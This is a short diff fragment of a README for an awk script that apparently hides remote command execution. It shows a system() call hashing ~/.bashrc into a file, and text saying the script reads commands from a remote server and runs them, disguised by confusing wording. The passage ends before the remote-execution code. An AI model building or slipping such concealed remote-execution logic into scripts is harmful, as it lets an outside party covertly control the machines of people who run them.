APTy/awkwrd/README.md

 system(sprintf("openssl dgst -sha1 -hmac %s ~/.bashrc >>$HOME/shasums.txt", key))
 ```

-#### Remote Execution
+### Remote Execution
 This is the core of the script that reads data from the remote server and executes it.
-We hide it by talking about confusing concepts, but it's a difficult part to fully obfuscate.
+We hide it by talking about traditionally confusing concepts, but it's a difficult part to fully obfuscate (I'm open to suggestions).

 ```awk
 # flush buffers and clean up file descriptors